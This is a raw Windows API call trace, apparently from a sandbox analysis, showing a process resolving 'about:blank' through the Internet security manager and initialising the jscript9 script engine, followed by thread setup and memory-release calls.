[0040.761] IUri:GetAbsoluteUri (in: This=0xb8a8c2fe40, pbstrAbsoluteUri=0xc0aab20320 | out: pbstrAbsoluteUri=0xc0aab20320*="about:blank") returned 0x0
[0040.761] IUnknown:Release (This=0xb8a8c2fe40) returned 0x5
[0040.761] IUnknown:Release (This=0xb8a8c30650) returned 0x6
[0040.761] IUnknown:Release (This=0xb8a8c30650) returned 0x5
[0040.762] memcpy_s (in: _Destination=0xb8a8c3c4f0, _DestinationSize=0x4, _Source=0xb8a8a2f780, _SourceSize=0x4 | out: _Destination=0xb8a8c3c4f0) returned 0x0
[0040.762] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0xb8a8a2f308, dwReserved=0x0 | out: ppSM=0xb8a8a2f308*=0xb8a8ccde70) returned 0x0
[0040.762] IUnknown:QueryInterface (in: This=0xb8a8ccde70, riid=0x7ffb233e61d8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0xb8a8a2f300 | out: ppvObject=0xb8a8a2f300*=0xb8a8ccde70) returned 0x0
[0040.762] IUnknown:Release (This=0xb8a8ccde70) returned 0x1
[0040.762] IInternetSecurityManager:SetSecuritySite (This=0xb8a8ccde70, pSite=0xc0aab09280) returned 0x0
[0040.762] IUnknown:AddRef (This=0xc0aab09280) returned 0x49
[0040.762] IUnknown:QueryInterface (in: This=0xc0aab09280, riid=0x7ffb2eb49210*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0xb8a8a2f2b0 | out: ppvObject=0xb8a8a2f2b0*=0xc0aab09288) returned 0x0
[0040.762] IServiceProvider:QueryService (in: This=0xc0aab09288, guidService=0x7ffb2eb48b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x7ffb2eb48b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0xb8a8ccded0 | out: ppvObject=0xb8a8ccded0*=0x0) returned 0x80004002
[0040.762] IServiceProvider:QueryService (in: This=0xc0aab09288, guidService=0x7ffb2eb48b98*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7ffb2eb48b98*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0xb8a8ccdec8 | out: ppvObject=0xb8a8ccdec8*=0x0) returned 0x80004002
[0040.762] IServiceProvider:QueryService (in: This=0xc0aab09288, guidService=0x7ffb2eb48ba8*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7ffb2eb48ba8*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0xb8a8ccdec0 | out: ppvObject=0xb8a8ccdec0*=0x0) returned 0x80004002
[0040.762] IServiceProvider:QueryService (in: This=0xc0aab09288, guidService=0x7ffb2eb48b88*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7ffb2eb48b88*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0xb8a8ccdeb8 | out: ppvObject=0xb8a8ccdeb8*=0x7ffb238e5d88) returned 0x0
[0040.762] IUnknown:Release (This=0xc0aab09288) returned 0x0
[0040.762] IUnknown:AddRef (This=0xb8a8ccde70) returned 0x2
[0040.762] IUnknown:AddRef (This=0xb8a8c2fe40) returned 0x6
[0040.762] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0040.762] IInternetSecurityManager:MapUrlToZone (in: This=0x7ffb238e5d88, pwszUrl="about:blank", pdwZone=0xb8a8a2f360, dwFlags=0x0 | out: pdwZone=0xb8a8a2f360*=0xffffffff) returned 0x800c0011
[0040.763] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0040.763] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0040.763] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0xb8a8ccde70, pUri=0xb8a8c2fe40, dwAction=0x2106, pPolicy=0xb8a8a2f350, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0xb8a8a2f390 | out: pPolicy=0xb8a8a2f350*=0x0, pdwOutFlags=0xb8a8a2f390*=0x0) returned 0x0
[0040.763] IInternetSecurityManager:ProcessUrlAction (in: This=0x7ffb238e5d88, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0xb8a8a2f350, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0xb8a8a2f350*=0x0) returned 0x0
[0040.763] IUnknown:Release (This=0xb8a8ccde70) returned 0x1
[0040.763] IUnknown:Release (This=0xb8a8c2fe40) returned 0x5
[0040.763] IUnknown:Release (This=0xb8a8c15f50) returned 0x0
[0040.763] memcpy_s (in: _Destination=0xb8a8ce6880, _DestinationSize=0xa, _Source=0xb8a8c1ef50, _SourceSize=0xa | out: _Destination=0xb8a8ce6880) returned 0x0
[0040.763] GetCurrentProcessId () returned 0x700
[0040.763] GetCurrentThreadId () returned 0x210
[0040.763] GetCurrentThreadId () returned 0x210
[0040.763] memcpy_s (in: _Destination=0xb8a8ce6940, _DestinationSize=0xa, _Source=0xb8a8c1ef50, _SourceSize=0xa | out: _Destination=0xb8a8ce6940) returned 0x0
[0040.763] IUnknown:Release (This=0xb8a8c30650) returned 0x2
[0040.763] IUnknown:Release (This=0xb8a8c2fe40) returned 0x4
[0040.763] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x4, lpflOldProtect=0x7ffb238e2840 | out: lpflOldProtect=0x7ffb238e2840*=0x2) returned 1
[0040.764] GetProcAddress (hModule=0x7ffb2dcd0000, lpProcName=0x2) returned 0x7ffb2dcda8a0
[0040.764] VirtualProtect (in: lpAddress=0x7ffb239e6000, dwSize=0x1648, flNewProtect=0x2, lpflOldProtect=0xb8a8a2f900 | out: lpflOldProtect=0xb8a8a2f900*=0x4) returned 1
[0040.764] LsDestroyContext ()
[0040.764] CoCreateInstance (in: rclsid=0x7ffb233ee4c8*(Data1=0x842a1268, Data2=0x6e6a, Data3=0x465c, Data4=([0]=0x86, [1]=0x8f, [2]=0x8b, [3]=0xc4, [4]=0x45, [5]=0xb9, [6]=0x82, [7]=0x8f)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffb233ec238*(Data1=0x8f88fd19, Data2=0x5d42, Data3=0x477b, Data4=([0]=0xbd, [1]=0x45, [2]=0xf6, [3]=0xa4, [4]=0xa9, [5]=0x77, [6]=0xed, [7]=0x5)), ppv=0xb8a8a2fa80 | out: ppv=0xb8a8a2fa80*=0xc0aa9f0d50) returned 0x0
[0041.022] GetCurrentProcess () returned 0xffffffffffffffff
[0041.022] GetSystemInfo (in: lpSystemInfo=0x7ffb223396f0 | out: lpSystemInfo=0x7ffb223396f0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0041.023] GetVersionExW (in: lpVersionInformation=0x7ffb22339750*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x7ffb22339750*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
[0041.023] GetEnvironmentVariableW (in: lpName="JS_DEBUG_SCOPE", lpBuffer=0xb8a8a2d290, nSize=0x104 | out: lpBuffer="퍐ꢢ¸") returned 0x0
[0041.026] IsDebuggerPresent () returned 0
[0041.026] __dllonexit () returned 0x7ffb22093610
[0041.026] __dllonexit () returned 0x7ffb22093630
[0041.026] __dllonexit () returned 0x7ffb22093640
[0041.026] __dllonexit () returned 0x7ffb220935e0
[0041.028] __dllonexit () returned 0x7ffb220935f0
[0041.028] __dllonexit () returned 0x7ffb22093600
[0041.028] LoadLibraryExW (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffb3d310000
[0041.032] __dllonexit () returned 0x7ffb22093620
[0041.033] GlobalMemoryStatusEx (in: lpBuffer=0xb8a8a2d460 | out: lpBuffer=0xb8a8a2d460) returned 1
[0041.034] __dllonexit () returned 0x7ffb22093650
[0041.034] __dllonexit () returned 0x7ffb22093660
[0041.034] __dllonexit () returned 0x7ffb22093670
[0041.034] __dllonexit () returned 0x7ffb22093690
[0041.034] __dllonexit () returned 0x7ffb22093680
[0041.034] __dllonexit () returned 0x7ffb220936a0
[0041.077] GetModuleFileNameW (in: hModule=0x7ffb21f00000, lpFilename=0x7ffb22339030, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\jscript9.dll" (normalized: "c:\\windows\\system32\\jscript9.dll")) returned 0x20
[0041.078] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ffb3a800000
[0041.128] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ffb3a85a1b0
[0041.129] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ffb3a8be790
[0041.130] ResolveDelayLoadedAPI () returned 0x7ffb39612e20
[0041.130] CryptAcquireContextW (in: phProv=0xb8a8a2d4e0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xb8a8a2d4e0*=0xb8a8cf4e40) returned 1
[0041.131] CryptGenRandom (in: hProv=0xb8a8cf4e40, dwLen=0x40, pbBuffer=0x7ffb22338ff0 | out: pbBuffer=0x7ffb22338ff0) returned 1
[0041.131] CryptReleaseContext (hProv=0xb8a8cf4e40, dwFlags=0x0) returned 1
[0041.131] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\JScriptLegacy", ulOptions=0x0, samDesired=0x20019, phkResult=0xb8a8a2d4e8 | out: phkResult=0xb8a8a2d4e8*=0x0) returned 0x2
[0041.141] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\JScriptLegacy", ulOptions=0x0, samDesired=0x20019, phkResult=0xb8a8a2d4e8 | out: phkResult=0xb8a8a2d4e8*=0x0) returned 0x2
[0041.141] EtwEventRegister (in: ProviderId=0x7ffb22271e90, EnableCallback=0x7ffb2211fea0, CallbackContext=0x7ffb22328400, RegHandle=0x7ffb2233a280 | out: RegHandle=0x7ffb2233a280) returned 0x0
[0041.141] EtwEventRegister (in: ProviderId=0x7ffb22271e80, EnableCallback=0x7ffb2211fea0, CallbackContext=0x7ffb223283b0, RegHandle=0x7ffb2233a290 | out: RegHandle=0x7ffb2233a290) returned 0x0
[0041.141] EtwEventRegister (in: ProviderId=0x7ffb22271e70, EnableCallback=0x7ffb2211fea0, CallbackContext=0x7ffb22330570, RegHandle=0x7ffb2233a288 | out: RegHandle=0x7ffb2233a288) returned 0x0
[0041.144] FindAtomW (lpString="{1b7cd997-e5ff-4932-a7a6-2a9e636da385}") returned 0x0
[0041.144] AddAtomW (lpString="{16d51579-a30b-4c8b-a276-0ff4dc41e755}") returned 0xc005
[0041.145] GetModuleHandleW (lpModuleName="api-ms-win-core-processthreads-l1-1-2.dll") returned 0x7ffb3d260000
[0041.145] GetProcAddress (hModule=0x7ffb3d260000, lpProcName="QueryProtectedPolicy") returned 0x7ffb3a86d460
[0041.145] VirtualProtect (in: lpAddress=0x7ffb22246800, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0xb8a8a2d4e0 | out: lpflOldProtect=0xb8a8a2d4e0*=0x2) returned 1
[0041.146] VirtualProtect (in: lpAddress=0x7ffb22246800, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0xb8a8a2d4e0 | out: lpflOldProtect=0xb8a8a2d4e0*=0x4) returned 1
[0041.146] DllGetClassObject (in: rclsid=0xb8a8c339e0*(Data1=0x842a1268, Data2=0x6e6a, Data3=0x465c, Data4=([0]=0x86, [1]=0x8f, [2]=0x8b, [3]=0xc4, [4]=0x45, [5]=0xb9, [6]=0x82, [7]=0x8f)), riid=0x7ffb3ce2f7c0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xb8a8a2e480 | out: ppv=0xb8a8a2e480*=0xc0aaa3e3c0) returned 0x0
[0041.146] NdrDllGetClassObject (in: rclsid=0xb8a8c339e0*(Data1=0x842a1268, Data2=0x6e6a, Data3=0x465c, Data4=([0]=0x86, [1]=0x8f, [2]=0x8b, [3]=0xc4, [4]=0x45, [5]=0xb9, [6]=0x82, [7]=0x8f)), riid=0x7ffb3ce2f7c0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xb8a8a2e480, pProxyFileList=0x7ffb22271b50, pclsid=0x7ffb2226bd58*(Data1=0xc20ed5c4, Data2=0xa2e, Data3=0x4f66, Data4=([0]=0x9b, [1]=0xe2, [2]=0x86, [3]=0xa1, [4]=0xc8, [5]=0x23, [6]=0xdd, [7]=0x68)), pPSFactoryBuffer=0x7ffb22338fb8 | out: ppv=0xb8a8a2e480*=0x0) returned 0x80040111
[0041.147] IClassFactory:CreateInstance (in: This=0xc0aaa3e3c0, pUnkOuter=0x0, riid=0xb8a8a2f380*(Data1=0x8f88fd19, Data2=0x5d42, Data3=0x477b, Data4=([0]=0xbd, [1]=0x45, [2]=0xf6, [3]=0xa4, [4]=0xa9, [5]=0x77, [6]=0xed, [7]=0x5)), ppvObject=0xb8a8a2e498 | out: ppvObject=0xb8a8a2e498*=0xc0aa9f0d50) returned 0x0
[0041.147] GetCurrentThreadId () returned 0x210
[0041.147] SetThreadStackGuarantee (in: StackSizeInBytes=0xb8a8a2e350 | out: StackSizeInBytes=0xb8a8a2e350) returned 1
[0041.148] GetCurrentThreadId () returned 0x210
[0041.148] RtlInitializeSListHead (in: ListHead=0xc0aaa49f70 | out: ListHead=0xc0aaa49f70)
[0041.148] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0xc0ace20000
[0041.150] GetProcessIoCounters (in: hProcess=0xffffffffffffffff, lpIoCounters=0xb8a8a2e250 | out: lpIoCounters=0xb8a8a2e250) returned 1
[0041.150] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e210 | out: lpPerformanceCount=0xb8a8a2e210*=414945193) returned 1
[0041.150] GetCurrentThread () returned 0xfffffffffffffffe
[0041.150] QueryThreadCycleTime (in: ThreadHandle=0xfffffffffffffffe, CycleTime=0xb8a8a2e280 | out: CycleTime=0xb8a8a2e280) returned 1
[0041.150] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e240 | out: lpPerformanceCount=0xb8a8a2e240*=414945405) returned 1
[0041.150] GetProcessIoCounters (in: hProcess=0xffffffffffffffff, lpIoCounters=0xb8a8a2e250 | out: lpIoCounters=0xb8a8a2e250) returned 1
[0041.150] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e210 | out: lpPerformanceCount=0xb8a8a2e210*=414945610) returned 1
[0041.150] GetCurrentThread () returned 0xfffffffffffffffe
[0041.150] QueryThreadCycleTime (in: ThreadHandle=0xfffffffffffffffe, CycleTime=0xb8a8a2e280 | out: CycleTime=0xb8a8a2e280) returned 1
[0041.150] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e240 | out: lpPerformanceCount=0xb8a8a2e240*=414945801) returned 1
[0041.150] GetProcessIoCounters (in: hProcess=0xffffffffffffffff, lpIoCounters=0xb8a8a2e250 | out: lpIoCounters=0xb8a8a2e250) returned 1
[0041.150] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e210 | out: lpPerformanceCount=0xb8a8a2e210*=414945999) returned 1
[0041.150] GetCurrentThread () returned 0xfffffffffffffffe
[0041.150] QueryThreadCycleTime (in: ThreadHandle=0xfffffffffffffffe, CycleTime=0xb8a8a2e280 | out: CycleTime=0xb8a8a2e280) returned 1
[0041.150] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e240 | out: lpPerformanceCount=0xb8a8a2e240*=414946188) returned 1
[0041.150] QueryPerformanceCounter (in: lpPerformanceCount=0xb8a8a2e2b0 | out: lpPerformanceCount=0xb8a8a2e2b0*=414946252) returned 1
[0041.151] RtlInitializeSListHead (in: ListHead=0xc0aaa4d6e0 | out: ListHead=0xc0aaa4d6e0)
[0041.151] RtlInitializeSListHead (in: ListHead=0xc0aaa4d720 | out: ListHead=0xc0aaa4d720)
[0041.151] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4fc
[0041.151] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x528
[0041.152] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x524
[0041.152] _beginthreadex (in: _Security=0x0, _StackSize=0x493e0, _StartAddress=0x7ffb2205ab40, _ArgList=0xc0aaa4d5d0, _InitFlag=0x10000, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x514
[0041.152] WaitForMultipleObjectsEx (nCount=0x2, lpHandles=0xb8a8a2e320*=0x528, bWaitAll=0, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
[0041.154] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x203000, flProtect=0x4) returned 0xc0ace90000
[0041.156] IUnknown:AddRef (This=0xc0aa9f0d50) returned 0x2
[0041.156] IUnknown:Release (This=0xc0aa9f0d50) returned 0x1
[0041.156] IUnknown:Release (This=0xc0aaa3e3c0) returned 0x0
[0041.156] IUnknown:QueryInterface (in: This=0xc0aa9f0d50, riid=0x7ffb233ec238*(Data1=0x8f88fd19, Data2=0x5d42, Data3=0x477b, Data4=([0]=0xbd, [1]=0x45, [2]=0xf6, [3]=0xa4, [4]=0xa9, [5]=0x77, [6]=0xed, [7]=0x5)), ppvObject=0xb8a8a2f9c8 | out: ppvObject=0xb8a8a2f9c8*=0xc0aa9f0d50) returned 0x0
[0041.156] IUnknown:Release (This=0xc0aa9f0d50) returned 0x1
[0041.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa51598 | out: lpSystemTimeAsFileTime=0xc0aaa51598*(dwLowDateTime=0xe82b02cb, dwHighDateTime=0x1d3a68a))
[0041.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515a8 | out: lpSystemTimeAsFileTime=0xc0aaa515a8*(dwLowDateTime=0xe82b02cb, dwHighDateTime=0x1d3a68a))
[0041.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515d0 | out: lpSystemTimeAsFileTime=0xc0aaa515d0*(dwLowDateTime=0xe82b02cb, dwHighDateTime=0x1d3a68a))
[0041.156] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc0aaa515d8 | out: lpSystemTimeAsFileTime=0xc0aaa515d8*(dwLowDateTime=0xe82b02cb, dwHighDateTime=0x1d3a68a))
[0041.157] GetThreadContext (in: hThread=0xfffffffffffffffe, lpContext=0xb8a8a2f330 | out: lpContext=0xb8a8a2f330*(P1Home=0x0, P2Home=0x0, P3Home=0x0, P4Home=0x0, P5Home=0x0, P6Home=0x0, ContextFlags=0x100002, MxCsr=0x0, SegCs=0x0, SegDs=0x0, SegEs=0x0, SegFs=0x0, SegGs=0x0, SegSs=0x0, EFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, Rax=0xc0aaa4d798, Rcx=0xb8a8a2f810, Rdx=0xb8a8a2f810, Rbx=0xc0aaa4d5d0, Rsp=0x0, Rbp=0x0, Rsi=0xc0aaa4d5d0, Rdi=0xc0aaa4d5d0, R8=0x200, R9=0xc0aaa42bb7, R10=0xc0aaa42bb8, R11=0xb8a8a2f750, R12=0x0, R13=0xb8a8c127f1, R14=0x0, R15=0x0, Rip=0x0, FltSave.ControlWord=0x0, FltSave.StatusWord=0x0, FltSave.TagWord=0x0, FltSave.Reserved1=0x0, FltSave.ErrorOpcode=0x0, FltSave.ErrorOffset=0x0, FltSave.ErrorSelector=0x0, FltSave.Reserved2=0x0, FltSave.DataOffset=0x0, FltSave.DataSelector=0x0, FltSave.Reserved3=0x0, FltSave.MxCsr=0x0, FltSave.MxCsr_Mask=0x0, FltSave.FloatRegisters.Low=0x0, FltSave.FloatRegisters.High=0x0, FltSave.XmmRegisters.Low=0x0, FltSave.XmmRegisters.High=0x0, FltSave.Reserved4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0), FltSave.StackControl=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0), FltSave.Cr0NpxState=0x0, Header.Low=0x0, Header.High=0x0, Legacy.Low=0x0, Legacy.High=0x0, Xmm0.Low=0x0, Xmm0.High=0x0, Xmm1.Low=0x0, Xmm1.High=0x0, Xmm2.Low=0x0, Xmm2.High=0x0, Xmm3.Low=0x0, Xmm3.High=0x0, Xmm4.Low=0x0, Xmm4.High=0x0, Xmm5.Low=0x0, Xmm5.High=0x0, Xmm6.Low=0x0, Xmm6.High=0x0, Xmm7.Low=0x0, Xmm7.High=0x0, Xmm8.Low=0x0, Xmm8.High=0x0, Xmm9.Low=0x0, Xmm9.High=0x0, Xmm10.Low=0x0, Xmm10.High=0x0, Xmm11.Low=0x0, Xmm11.High=0x0, Xmm12.Low=0x0, Xmm12.High=0x0, Xmm13.Low=0x0, Xmm13.High=0x0, Xmm14.Low=0x0, Xmm14.High=0x0, Xmm15.Low=0x0, Xmm15.High=0x0, VectorRegister.Low=0x0, VectorRegister.High=0x0, VectorControl=0x0, DebugControl=0x0, LastBranchToRip=0x0, LastBranchFromRip=0x0, LastExceptionToRip=0x0, LastExceptionFromRip=0x0)) returned 1
[0041.157] VirtualFree (lpAddress=0xc0ace96000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.157] VirtualFree (lpAddress=0xc0ace97000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.157] VirtualFree (lpAddress=0xc0ace98000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.158] VirtualFree (lpAddress=0xc0ace99000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.177] VirtualFree (lpAddress=0xc0ace9a000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.178] VirtualFree (lpAddress=0xc0ace9b000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.178] VirtualFree (lpAddress=0xc0ace9c000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.178] VirtualFree (lpAddress=0xc0ace9d000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.178] VirtualFree (lpAddress=0xc0ace9e000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.178] VirtualFree (lpAddress=0xc0ace9f000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.178] VirtualFree (lpAddress=0xc0acea0000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.178] VirtualFree (lpAddress=0xc0acea1000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.179] VirtualFree (lpAddress=0xc0acea2000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.179] VirtualFree (lpAddress=0xc0acea3000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.179] VirtualFree (lpAddress=0xc0acea4000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.179] VirtualFree (lpAddress=0xc0acea5000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.179] VirtualFree (lpAddress=0xc0acea6000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.179] VirtualFree (lpAddress=0xc0acea7000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.179] VirtualFree (lpAddress=0xc0acea8000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.180] VirtualFree (lpAddress=0xc0acea9000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.180] VirtualFree (lpAddress=0xc0aceaa000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.180] VirtualFree (lpAddress=0xc0aceab000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.180] VirtualFree (lpAddress=0xc0aceac000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.180] VirtualFree (lpAddress=0xc0acead000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.180] VirtualFree (lpAddress=0xc0aceae000, dwSize=0x1000, dwFreeType=0x4000) returned 1
[0041.180] VirtualFree (lpAddress=0xc0aceaf000, dwSize=0x1000, dwFreeType=0x4000) returned 1
